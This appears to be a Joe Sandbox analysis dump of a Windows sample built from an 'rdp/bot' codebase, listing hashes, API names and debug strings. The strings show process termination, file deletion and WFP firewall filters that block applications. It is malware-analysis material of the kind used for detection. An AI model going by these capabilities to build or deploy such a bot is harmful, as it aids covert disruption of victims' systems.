                    • Instruction ID: dfa884f8b79c34c823369a128e68ec0bee882247c44b9b1a67834bab0760144d
                    • Opcode Fuzzy Hash: 04e2900766d9d14cb05d71eedaab4efe8780466c1436e7a6fc7beb0f48e5108a
                    • Instruction Fuzzy Hash: E9E0E583E0DBD351F3139A394C646285E901F52764F8C42B6C7980B2D3CE8C3C21C221
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ad621d27ed11d527f0a4eb9abd0c574f9942df0d3b361b300398ff936c25c339
                    • Instruction ID: 8eacfc94772ec22b91150498c3398c696784a8ebfa5c67f24c6d9c4bcea80089
                    • Opcode Fuzzy Hash: ad621d27ed11d527f0a4eb9abd0c574f9942df0d3b361b300398ff936c25c339
                    • Instruction Fuzzy Hash: 0CA00213D4DC09C8F6401F01EC41572A538EF06600FC82534C128520958B6CA020C114
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    Similarity
                    • API ID: ErrorLast$Process$CloseCreateFirstHandleOpenProcess32SnapshotTerminateToolhelp32strcmp
                    • String ID: $ $ $ $(name != NULL) || (pid != 0)$C:/Projects/rdp/bot/codebase/process.c$NULL$P$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu)$[E] (%s) -> Failed(name=%s,pid=%lu,err=%08x)$[E] (%s) -> OpenProcess failed(gle=%lu)$[E] (%s) -> Process32First failed(gle=%lu)$[E] (%s) -> Process32Next failed(gle=%lu)$[E] (%s) -> TerminateProcess failed(gle=%lu)$[I] (%s) -> Done(name=%s,pid=%lu)$process_kill$|$~$~$~$~
                    • API String ID: 3326156344-4160762685
                    • Opcode ID: 785da6137a2a4b931382c2af0aea3e34208494ad0edd5f9faf333949fd61b4c7
                    • Instruction ID: 99d6b1e90a4626231889cf16e8b65600a79c51f28a69aadf7809e434feb0d462
                    • Opcode Fuzzy Hash: 785da6137a2a4b931382c2af0aea3e34208494ad0edd5f9faf333949fd61b4c7
                    • Instruction Fuzzy Hash: C0F12D11E0CA03A2FA747E57ACC0F78D240AF15754EE80DB2CA0E466D2DF5DBDB59262
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    Similarity
                    • API ID: strlen$DirectoryErrorLastRemovestrcmpstrcpy$fflushfwrite
                    • String ID: (path != NULL)$*$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Delete(path_wc=%s,f_path=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_delete
                    Similarity
                    • API ID: strlen$strcatstrcpy$strcmp
                    • String ID: (dst != NULL)$(src != NULL)$*$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Copy(f_src=%s,f_dst=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(src=%s,dst=%s,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s)$[I] (%s) -> Filtered(f_src=%s,flt=%s)$fs_dir_copy$|
                    Similarity
                    • API ID: ErrorLastLocalToken$AllocInformation$CloseFreeHandleLengthOpenProcessfflushfwritememcpy
                    • String ID: (hnd != NULL)$(sid != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetTokenInformation failed(hnd=0x%p,gle=%lu)$[E] (%s) -> OpenProcessToken failed(hnd=0x%p,gle=%lu)$process_get_user_sid
                    Similarity
                    • API ID: FilterFwpmHeap$Add0DeleteFreeKey0Process$AttributesFilewcslen
                    • String ID: 3L$;9rJ$TL$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterAdd0(IPv6) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv6) failed(res=%08lx)$setup_app_filt
                    Similarity
                    • API ID: strlen$CreateDirectoryErrorLast$strcpy
                    • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
                    Similarity
                    • API ID: ErrorLastProcess$CloseCodeExitHandle$ObjectSingleTerminateWait
                    • String ID: (pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(pid=%lu,err=%08x)$[E] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$[E] (%s) -> TerminateProcess failed(pid=%lugle=%lu)$[I] (%s) -> Done(pid=%lu,exit_code=%08lx)$[W] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$process_close
                    Similarity
                    • API ID: AttributesErrorFileLast
                    • String ID: $(attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$P$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu)$c$fs_attr_get$~
                    Similarity
                    • API ID: EnvironmentErrorExpandLastStringsfflushfwrite
                    • String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
                    Similarity
                    • API ID: ErrorLast$Resource$FindLoadfflushfwrite
                    • String ID: (hnd != NULL)$(out != NULL)$C:/Projects/rdp/bot/codebase/module.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu)$[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu)$[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat$module_get_version
                    Similarity
                    • API ID: strlen
                    • String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
                    Similarity
                    • API ID: Heap$Processstrlen$AllocFree
                    • String ID: (buf != NULL)$(buf_sz != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Memory allocation failed(size=%llu)$ini_get_bytes$mem_alloc
                    Similarity
                    • API ID: AttributesFile$ErrorLast
                    • String ID: (attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x)$[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu)$fs_attr_set
                    Similarity
                    • API ID: CloseErrorFileHandleLastUnlockfflushfwrite
                    • String ID: ((*lock) != INVALID_HANDLE_VALUE)$(lock != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(lock=%p,err=%08x)$[E] (%s) -> UnlockFileEx failed(hnd=%p,gle=%lu)$[I] (%s) -> Done(lock=%p)$fs_file_unlock
                    Similarity
                    • API ID: Heap$Process$AllocCriticalFileSection$AttributesCopyEnterFreeLeavefflushfwritememcpywcslen
                    • String ID: [E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc
                    Similarity
                    • API ID: ErrorFileLastModuleName
                    • String ID: (hnd != NULL)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetModuleFileNameA failed(hnd=0x%p,gle=%lu)$fs_module_path$wfpblk.lock
                    Similarity
                    • API ID: ErrorFileLast$CloseCreateHandleSize
                    • String ID: (path != NULL)$(size != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_size
                    • API String ID: 3555958901-1687387729
                    • Opcode ID: d18fac45b14cf10bbf4c722dcfb8da80885c7e019db0d3d867bd787882fa545c
                    • Instruction ID: 49f3698f14fdc481fdd94c504e69f654de9ae5d58b5a3a20c01709ce51d3b413
                    • Opcode Fuzzy Hash: d18fac45b14cf10bbf4c722dcfb8da80885c7e019db0d3d867bd787882fa545c
                    • Instruction Fuzzy Hash: ED613E53E0D913A2FA226E16ACC4B7892505F41378FAD4D36C85E8B2D0DF6DBCA44272
                    Similarity
                    • API ID: ErrorLastObjectSingleWait
                    • String ID: $(pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> WaitForSingleObject failed(pid=%lugle=%lu)$process_wait$~
                    • API String ID: 1211598281-4195011794
                    • Opcode ID: e614e6465d37558f7135f5dc73c12c5e46b17844bf3c93edc2c800c8d8d16f3e
                    • Instruction ID: 50805e59d9c4af91caad0ecd0a1af27d922e4c42a0faa62c6d9ddfc2277f1c6c
                    • Opcode Fuzzy Hash: e614e6465d37558f7135f5dc73c12c5e46b17844bf3c93edc2c800c8d8d16f3e
                    • Instruction Fuzzy Hash: D531FD11E0CA0382FB747F9AACC4B7892409F4C315EE85932CE1F466D19F9DBDB59261
                    Similarity
                    • API ID: File$CloseCreateErrorHandleLastTime
                    • String ID: (ctime != NULL) || (atime != NULL) || (mtime != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_stat
                    • API String ID: 2291555494-3647951244
                    • Opcode ID: d05849413dc51ef2d9fca7690cede0a83bfffe58287aac246e24bd13c564f661
                    • Instruction ID: 40d20484eba431830571d2ffbf5787f04439e205f27db4a2a03916e40484447b
                    • Opcode Fuzzy Hash: d05849413dc51ef2d9fca7690cede0a83bfffe58287aac246e24bd13c564f661
                    • Instruction Fuzzy Hash: B7516263D0C903A6FB226E12ACC8B78D2906F007A8F9C4E31D91D4B2D4DF6DBD658361
                    Similarity
                    • API ID: _errno$_strtoui64
                    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                    • API String ID: 3513630032-2210897324
                    • Opcode ID: 589a136158d6230515a1194aa1ded0d18727e1947aff480698b1c5f8eabd8088
                    • Instruction ID: 0ec73aee0d6819d65d4991ce573dd4ab387235e3ff8b319d8e81734dba072647
                    • Opcode Fuzzy Hash: 589a136158d6230515a1194aa1ded0d18727e1947aff480698b1c5f8eabd8088
                    • Instruction Fuzzy Hash: B5218222608A8796F355AF56FC80BAAB361BF44784F884432EE4C47794DF7DE8A5C710
                    Similarity
                    • API ID: Virtual$ErrorLastProtectQuery
                    • String ID: Unknown pseudo relocation protocol version %d.$ VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                    • API String ID: 637304234-2693646698
                    • Opcode ID: 0313bfd795e33c478de3b3b1d00fed192ebc31b1e7fa87f2c769477b445c50a5
                    • Instruction ID: 2059ff460e1d3424c9feeac6a2f123c990abf6a1583e46be0fca4a85c9005a4b
                    • Opcode Fuzzy Hash: 0313bfd795e33c478de3b3b1d00fed192ebc31b1e7fa87f2c769477b445c50a5
                    • Instruction Fuzzy Hash: 1B31A222B05A4242EA04AF16ECC1978A361FF44B84B888935DD1C473E4DF3CF876C350
                    Similarity
                    • API ID: _errno
                    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
                    • API String ID: 2918714741-1991603811
                    • Opcode ID: 3920f8d66e3a10739eb1f1376af4a68c38db9251a04340267e2f2ef4fec26f98
                    • Instruction ID: c6ea8aca907176ac568ece3e421fc85e47750a44ff264e0e44b04a4821cfd09d
                    • Opcode Fuzzy Hash: 3920f8d66e3a10739eb1f1376af4a68c38db9251a04340267e2f2ef4fec26f98
                    • Instruction Fuzzy Hash: 3A214F62A08A4792F711AF12ED80FAAA760BF44794F884435EE4C47B94DF7CE9A5C710
                    Similarity
                    • API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
                    • String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                    • API String ID: 1211020085-2360327764
                    • Opcode ID: 88c05cf3388c31f6539c777c819c7d3a90aec0ace9ad2e7913c4a6265e0f6128
                    • Instruction ID: fcef8ee9c6ac7b85111d14f3af3749fc48d99a1542dab6aff9d6044288ea6212
                    • Opcode Fuzzy Hash: 88c05cf3388c31f6539c777c819c7d3a90aec0ace9ad2e7913c4a6265e0f6128
                    • Instruction Fuzzy Hash: 8411AF16A09B0366FA647F53ACC0B3AA690AF45785F8C0C75CD0E062D5DF6DFC758220
                    Similarity
                    • API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
                    • String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                    • API String ID: 1211020085-2360327764
                    • Opcode ID: 13135dc92655dd0311b3d6bf8182c1d35b336fe44a1bbcbcee5e7a69c6267571
                    • Instruction ID: 423cede8a48fefea5a2354057bf6e0c971d09ed3ad8fb34f0876c4cafb80d5e2
                    • Opcode Fuzzy Hash: 13135dc92655dd0311b3d6bf8182c1d35b336fe44a1bbcbcee5e7a69c6267571
                    • Instruction Fuzzy Hash: BE11AF16A09B0362FA647F53ACC0B3AA690AF45785F8C0C75CD0E066D5DF6DFC758220
                    Similarity
                    • API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
                    • String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                    • API String ID: 1211020085-2360327764
                    • Opcode ID: 428854276a19afd972f6b4d6ee3694a8adab8d34ab153aabfc6d5cf6082bcee5
                    • Instruction ID: 2f165abf989e21611120181e2ad008377361ef6ea3d779a54e7069946dbf93cd
                    • Opcode Fuzzy Hash: 428854276a19afd972f6b4d6ee3694a8adab8d34ab153aabfc6d5cf6082bcee5
                    • Instruction Fuzzy Hash: 0211AF16A09B0366FA647F53ACC0B3AA690AF45785F8C0C75CD0E062D5DF6DFC758220
                    Similarity
                    • API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
                    • String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                    • API String ID: 1211020085-2360327764
                    • Opcode ID: 64c6a43e05c053217d390114a923dfece3a0f6ad1aba6964d62390b6ba7d5058
                    • Instruction ID: bd3fc6c823deddff94a4f4c5fc4a7f8b5ef0e6d16658b8136252f2faa255d325
                    • Opcode Fuzzy Hash: 64c6a43e05c053217d390114a923dfece3a0f6ad1aba6964d62390b6ba7d5058
                    • Instruction Fuzzy Hash: 9911AF16A09B0362FA657F53ACC0B3AA690AF45785F8C0C75CD0E062D5DF6DFC758221
                    Similarity
                    • API ID: CopyErrorFileLastfflushfwrite
                    • String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
                    • API String ID: 2887799713-3464183404
                    • Opcode ID: a69eb8bfe6720e7fe071f149a0ba004c6831c9e0fa074345eb1c7da25808f617
                    • Instruction ID: d8bec77612d045ef0e97df815306858e60070c289a66ca4e2c6d6096e74fd3fc
                    • Opcode Fuzzy Hash: a69eb8bfe6720e7fe071f149a0ba004c6831c9e0fa074345eb1c7da25808f617
                    • Instruction Fuzzy Hash: 3941715390DA16A1FA266F57AC80B79D6547F01BCCEDC0932C90F066D4EF9CBEA19321
                    Similarity
                    • API ID: DeleteErrorFileLast
                    • String ID: NULL$[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[I] (%s) -> Done(path=%s)$fs_file_delete
                    • API String ID: 2018770650-4119452840
                    • Opcode ID: eae0ad0529d85d7c6d721daa2f0adb39329f1e0d04141bbba5f626ec2f22a190
                    • Instruction ID: dd23040084022dbf46e6902405f30b25228f6633ca32dac07346c1aeee266ccf
                    • Opcode Fuzzy Hash: eae0ad0529d85d7c6d721daa2f0adb39329f1e0d04141bbba5f626ec2f22a190
                    • Instruction Fuzzy Hash: 5F31FC19E0CE0655FA607E46ACC0B79A2514F85B44EDD0D32CA1E072D1EF6CBDA69322
                    Similarity
                    • API ID: strlen
                    • String ID: ((match == NULL) || (match_len != NULL))$(needle != NULL)$(pattern != NULL)$C:/Projects/rdp/bot/codebase/utils.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$str_match
                    • API String ID: 39653677-892027187
                    • Opcode ID: fafdafe653b9ac92441e29dc3b04a1d9ce8b4508dbd218ce2f7c162b279029fe
                    • Instruction ID: 01a44442677f32bbf80b09a4e593cf657da0b1f66707ad7f38c8deb2e10c4d78
                    • Opcode Fuzzy Hash: fafdafe653b9ac92441e29dc3b04a1d9ce8b4508dbd218ce2f7c162b279029fe
                    • Instruction Fuzzy Hash: B651D152A19993D5FE96BE57AC90FB596517F00B88FCC0832D94E0A2D4DF6CFD318220
                    Similarity
                    • API ID: strlen$strcat
                    • String ID: (file_path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_module_file
                    • API String ID: 2335785903-2423714266
                    • Opcode ID: e2649656a3eea21e57497fc96b6ce74672c4d11e199c284366f561a3de01ebd7
                    • Instruction ID: 93defa54ecb8ea6a9e297eb6c692c70c44c57ad11dbd06aa87a222d1a932a38c
                    • Opcode Fuzzy Hash: e2649656a3eea21e57497fc96b6ce74672c4d11e199c284366f561a3de01ebd7
                    • Instruction Fuzzy Hash: 00119D62A08A4344FA117F17AC94BB596816F02B88F8C4830EE0D1A2C2FF6DA8348360
                    Similarity
                    • API ID: fwprintf$strlen
                    • String ID: %*.*S$%-*.*S$%.*S
                    • API String ID: 2636243462-2115465065
                    • Opcode ID: 32549ed93d4336b5084efa2f50b5c29187e804bb01ab93832d870b3eedf07b11
                    • Instruction ID: 303308e4f0bcf797b94b76c40e1813504aefd411357603b6aea83485549dc96f
                    • Opcode Fuzzy Hash: 32549ed93d4336b5084efa2f50b5c29187e804bb01ab93832d870b3eedf07b11
                    • Instruction Fuzzy Hash: D931B662E18A5245E750BE279C80D78F691EF44BA4F88C931DD5D8BBC5DF2EF8208760
                    Similarity
                    • API ID: AddressErrorLastLibraryLoadProc
                    • String ID: Done$Wow64RevertWow64FsRedirection$[E] (%s) -> Wow64RevertWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_revert$kernel32
                    • API String ID: 3511525774-1584720945
                    • Opcode ID: fa2267f9570cbef4649007a3857e107e00d478d94a1d7705d6875d883778b630
                    • Instruction ID: fdb5a23c358fe9b2f3edaf27004acc6d405121ded3e38ca296656e32ff8a204b
                    • Opcode Fuzzy Hash: fa2267f9570cbef4649007a3857e107e00d478d94a1d7705d6875d883778b630
                    • Instruction Fuzzy Hash: AB11E861E1CA43A1FA55BF17ACC5BB492506F44309FC80835D80E56AE1EFACF974D320
                    Similarity
                    • API ID: AddressErrorLastLibraryLoadProcfflushfwrite
                    • String ID: Done$Wow64DisableWow64FsRedirection$[E] (%s) -> Wow64DisableWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_disable$kernel32
                    • API String ID: 1533789296-1853374401
                    Similarity
                    • API ID: CloseHandle
                    • String ID: (pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$process_free
                    • API String ID: 2962429428-1801624891
                    Similarity
                    • API ID: DeviceErrorLastQuery
                    • String ID: %S%S$[E] (%s) -> QueryDosDeviceW failed(gle=%lu)$path_convert_to_nt
                    • API String ID: 963133057-3473575966
                    Similarity
                    • API ID: fwprintf
                    • String ID: %*.*s$%-*.*s$%.*s$%S%S
                    • API String ID: 968622242-2451587232
                    Similarity
                    • API ID: CloseErrorHandleLastNextProcess32
                    • String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
                    • API String ID: 1692733154-1215713629
                    Similarity
                    • API ID: CloseErrorHandleLastNextProcess32
                    • String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
                    • API String ID: 1692733154-1215713629
                    Similarity
                    • API ID: CloseErrorHandleLastNextProcess32
                    • String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
                    • API String ID: 1692733154-1215713629
                    Similarity
                    • API ID: CloseErrorHandleLastNextProcess32
                    • String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
                    • API String ID: 1692733154-1215713629
                    Similarity
                    • API ID: CriticalDeleteSectionfclose
                    • String ID: Done$[I] (%s) -> %s$debug_cleanup
                    • API String ID: 3387974148-4247581856
                    APIs
                    • VirtualProtect.KERNEL32(?,?,00007FF7048AA1E8,00000000,?,?,?,00007FF7048AA1E0,00007FF704891208,?,?,?,00007FF704891313), ref: 00007FF70489ABC2
                    Strings
                    • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF70489AB5D
                    • Unknown pseudo relocation protocol version %d., xrefs: 00007FF70489AA62
                    • Unknown pseudo relocation bit size %d., xrefs: 00007FF70489AAEB
                    Similarity
                    • API ID: ProtectVirtual
                    • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                    • API String ID: 544645111-1286557213
                    Similarity
                    • API ID: ErrorHandleLastModule
                    • String ID: [E] (%s) -> GetModuleHandleExA failed(gle=%lu)$module_current
                    • API String ID: 4242514867-2427012484
                    Similarity
                    • API ID: Byte$CharMultiWide$Lead_errno
                    • String ID:
                    • API String ID: 2766522060-0
                    Similarity
                    • API ID: signal
                    • String ID: CCG
                    • API String ID: 1946981877-1584390748
                    Similarity
                    • API ID: fprintf
                    • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                    • API String ID: 383729395-3474627141
                    Similarity
                    • API ID: fprintf
                    • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                    • API String ID: 383729395-4064033741
                    Similarity
                    • API ID: fprintf
                    • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                    • API String ID: 383729395-2713391170
                    Similarity
                    • API ID: fprintf
                    • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                    • API String ID: 383729395-2187435201
                    Similarity
                    • API ID: fprintf
                    • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                    • API String ID: 383729395-4273532761
                    • Opcode ID: 13a3b1830272570e6661193a87d44eff3ce7335499efeae423e896c0a233d03e
                    • Instruction ID: b0372e98b2bb340b9e4a89bfd6f433199ac907dd8596c4db958e8bccaaf41090
                    • Opcode Fuzzy Hash: 13a3b1830272570e6661193a87d44eff3ce7335499efeae423e896c0a233d03e
                    • Instruction Fuzzy Hash: 05F06D67808F8482D2119F19E8406ABB370FF9E389F645726EBC926668DF2DD5628700
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fprintf
                    • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                    • API String ID: 383729395-4283191376
                    • Opcode ID: bfc60d37ca9a6988f5593f672af36c5057a585c8f9be36fa9b4a9f9ad44e5480
                    • Instruction ID: 235d3d3d65da40c2969a59d22fad221ccdc94dba7fac17105d334b65224917ae
                    • Opcode Fuzzy Hash: bfc60d37ca9a6988f5593f672af36c5057a585c8f9be36fa9b4a9f9ad44e5480
                    • Instruction Fuzzy Hash: AFF06D67808F8482D2119F19E8406ABB370FF9E389F645726EBCD26668DF2DD5228710
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fprintf
                    • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                    • API String ID: 383729395-2468659920
                    • Opcode ID: 1e66a750eef62416fe29ac226196076c421e718d702112074ece5bc511332d35
                    • Instruction ID: cc0c3280b690b3a5492972b510ec3d4c2158797aafa69587b0ac0dc0ed01c6b9
                    • Opcode Fuzzy Hash: 1e66a750eef62416fe29ac226196076c421e718d702112074ece5bc511332d35
                    • Instruction Fuzzy Hash: E6F06D67808F8482D2019F19E4406ABB370FF9E789F605726EFC826668DF2DD5228700

                    Execution Graph

                    Execution Coverage:6.3%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:3.2%
                    Total number of Nodes:2000
                    Total number of Limit Nodes:35
59755->60747 59756 7ff8bfaba741 59756->59758 60755 7ff8bfab6941 InitializeCriticalSectionAndSpinCount 59756->60755 59758->59218 60889 7ff8bfb8143c InitializeCriticalSectionAndSpinCount 59759->60889 59762 7ff8bfb84529 59764 7ff8bfb8452d 59762->59764 60956 7ff8bfb824ae WSAStartup 59762->60956 59767 7ff8bfb81292 19 API calls 59764->59767 59776 7ff8bfb8454a 59767->59776 59768 7ff8bfb8459b 59768->59764 60964 7ff8bfb89fe1 InitializeCriticalSectionAndSpinCount 59768->60964 59776->59218 59777->59218 59778->59218 59780 7ff8ba501590 GetLastError 59779->59780 59781 7ff8ba50146a 59779->59781 59783 7ff8ba501292 6 API calls 59780->59783 59782 7ff8ba509cc0 8 API calls 59781->59782 59784 7ff8ba501486 59782->59784 59794 7ff8ba501569 59783->59794 59785 7ff8ba506dd1 8 API calls 59784->59785 59786 7ff8ba50149a 59785->59786 59787 7ff8ba5014a4 strlen 59786->59787 59786->59794 59788 7ff8ba5014d3 59787->59788 59789 7ff8ba5014bd 59787->59789 59792 7ff8ba5014f8 strlen fopen 59788->59792 59793 7ff8ba5014d8 strcat strlen 59788->59793 59789->59788 59791 7ff8ba5014c2 strlen 59789->59791 59790 7ff8ba501292 6 API calls 59795 7ff8ba501586 